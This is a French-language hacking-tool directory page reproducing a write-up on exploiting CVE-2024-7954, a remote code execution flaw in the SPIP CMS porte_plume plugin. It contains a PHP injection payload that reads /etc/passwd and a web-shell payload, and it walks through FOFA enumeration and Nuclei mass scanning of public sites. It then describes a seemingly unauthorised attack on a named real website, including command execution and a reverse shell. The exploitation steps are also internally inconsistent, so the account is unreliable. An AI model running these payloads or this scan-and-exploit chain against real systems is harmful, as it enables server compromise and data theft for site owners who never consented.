Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Exploitation-of-a-Remote-Code-Execution-vulnerability--CVE-2024-7954- — Exploitation d'une vulnérabilité d'exécution de code à distance- (CVE-2024-7954) | Kitploit
Outils/GitHubGitHub/shivanshkuntal/exploitation-of-a-remote-code-execution-vulnerability--cve-2024-7954-
ReconnaissanceScanners de Vulnérabilités WebAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionApprentissage et ÉducationRed Teaming

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Développement de Charges Utiles
Labs et Pratique
GitHubshivanshkuntal/exploitation-of-a-remote-code-execution-vulnerability--cve-2024-7954-

Exploitation-of-a-Remote-Code-Execution-vulnerability--CVE-2024-7954-

Exploitation d'une vulnérabilité d'exécution de code à distance- (CVE-2024-7954)

Voir le dépôt
1il y a 8 moisPas encore vérifié
Partager

Exploitation de la vulnérabilité d'exécution de code à distance (CVE-2024-7954)

Projet de test de vulnérabilité logicielle Soumis par : Shivansh Kuntal


Aperçu

Ce projet démontre l'exploitation de CVE-2024-7954, une vulnérabilité critique d'exécution de code à distance (RCE) affectant SPIP CMS via son plugin porte_plume. La vulnérabilité permet à des attaquants non authentifiés d'exécuter du code PHP arbitraire sur le serveur cible via des requêtes HTTP POST forgées.

Les tests ont été menés dans un environnement local contrôlé, puis étendus à une reconnaissance réelle à l'aide de FOFA et Nuclei.


1. Configuration de l'environnement

Une version vulnérable de SPIP CMS, confirmée comme étant affectée par CVE-2024-7954, a été déployée localement sur un serveur Apache à l'aide d'un dépôt GitHub hébergeant des versions connues comme vulnérables.

Outils utilisés

  • Burp Suite (interception et modification des requêtes HTTP)
  • Serveur Web Apache
  • Moteur de recherche FOFA
  • Scanner de vulnérabilités Nuclei
  • curl (exploitation en ligne de commande)

La page d'accueil de SPIP accessible sur localhost a validé l'installation réussie et a servi de cible pour l'exploitation.


2. Description de la vulnérabilité

Le plugin porte_plume (avant les versions 4.30-alpha2, 4.2.13, 4.1.16) est vulnérable en raison d'un assainissement insuffisant des entrées fournies par l'utilisateur. Les attaquants peuvent injecter du code PHP dans des champs de formulaire spécifiques, qui est ensuite rendu et exécuté par le serveur.

Impact : Exécution de code à distance sans authentification Sévérité : Critique Vecteur d'attaque : Réseau / HTTP POST


3. Preuve de concept (PoC)

Requête POST malveillante

root@kitploit:~
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{hostname}}
Content-Type: application/x-www-form-urlencoded

data=AA_[<img111111>->URL`<?php system('cat /etc/passwd'); ?>`]_BB

Remarques

  • Le code PHP est injecté dans le moteur de formatage markdown.
  • Exécuté avec l'utilisateur SPIP sur le serveur.
  • L'attaque ne nécessite aucune authentification.

4. Reconnaissance avec FOFA

Une requête FOFA a été utilisée pour énumérer les installations SPIP publiques :

root@kitploit:~
app="SPIP"

FOFA a renvoyé plusieurs points de métadonnées :

  • En-têtes HTTP
  • Titres
  • Adresses IP et géolocalisation
  • Pile technologique du serveur

Valeur de la reconnaissance

  1. Énumération des cibles : Identifier les serveurs SPIP CMS accessibles.
  2. Empreinte de version : Déterminer si des versions de plugins vulnérables sont actives.
  3. Priorisation : Sélectionner les systèmes probablement exploitables.
  4. Vérification de l'exploit : Valider les points de terminaison à l'aide de charges utiles contrôlées.
  5. Automatisation : Exporter les résultats FOFA dans targets.txt pour un scan par lots.

Un hôte réel approprié a été identifié :

root@kitploit:~
http://www.comite-tricolore.org/

5. Scan automatisé avec Nuclei

Objectif

Étant donné que l'exploitation manuelle est lente, Nuclei a été utilisé pour automatiser la détection de CVE-2024-7954 sur un grand ensemble de cibles.

Commande (modèle personnalisé)

root@kitploit:~
nuclei -l targets.txt -t CVE-2024-7954.yaml
  • -l targets.txt charge les résultats FOFA
  • -t charge le modèle PoC personnalisé

Remarque : Le modèle initial a renvoyé aucun résultat.

Scan CVE étendu

root@kitploit:~
nuclei -l targets.txt -t cves/

Ce scan a identifié une cible répondante :

root@kitploit:~
http://www.comite-tricolore.org/

6. Validation manuelle et exploitation

Étape 1 — Inspecter le point de terminaison vulnérable

Visiter :

root@kitploit:~
http://www.comite-tricolore.org/spip.php?page=contact

Confirmé :

  • Champs de saisie pour le nom, l'e-mail, le message
  • Gestionnaire de requêtes POST adapté à l'injection de charge utile

Étape 2 — Injecter la charge utile PHP

À l'aide de Burp Suite ou de curl, modifier le paramètre message :

Charge utile

root@kitploit:~
<?php system($_GET['cmd']); ?>

Étape 3 — Déclencher l'exécution de commande

Visiter :

root@kitploit:~
http://www.comite-tricolore.org/spip.php?page=contact&cmd=id

Ou avec curl :

root@kitploit:~
curl "http://www.comite-tricolore.org/spip.php?page=contact&cmd=id"

La sortie a confirmé l'exécution de commande à distance.

Étape 4 — Reverse shell (accès final)

Une charge utile forgée permet un callback reverse shell, offrant :

  • whoami
  • ls
  • un accès complet à un shell interactif

7. Observations critiques

  • L'exploit non authentifié augmente considérablement la sévérité.
  • L'échec de l'assainissement des entrées dans le plugin est le problème central.
  • Une fois le PHP injecté et rendu, la compromission complète du serveur est possible.
  • Reverse shell → élévation de privilèges potentielle → prise de contrôle du serveur.
  • L'attaque est triviale à automatiser avec curl, des scripts Python ou Nuclei.

8. Conclusion

Ce projet démontre la chaîne d'exploitation complète pour CVE-2024-7954, de la reconnaissance à l'obtention d'un shell interactif.

Chemin d'exploitation

  1. Reconnaissance (FOFA)
  2. Scan automatisé (Nuclei)
  3. Injection manuelle de la charge utile
  4. Exécution de code vérifiée
  5. Accès reverse shell

Leçons de sécurité

  • La validation stricte des entrées est obligatoire pour toutes les données contrôlées par l'utilisateur.
  • Les plugins doivent suivre des pratiques de codage sécurisées.
  • Les organisations doivent appliquer rapidement les correctifs de sécurité.
  • Des évaluations régulières des vulnérabilités sont essentielles pour prévenir les attaques RCE.

Cette vulnérabilité montre comment un plugin de formatage de texte apparemment inoffensif peut entraîner une compromission complète du système lorsqu'il est mal sécurisé.

Télécharger l’outil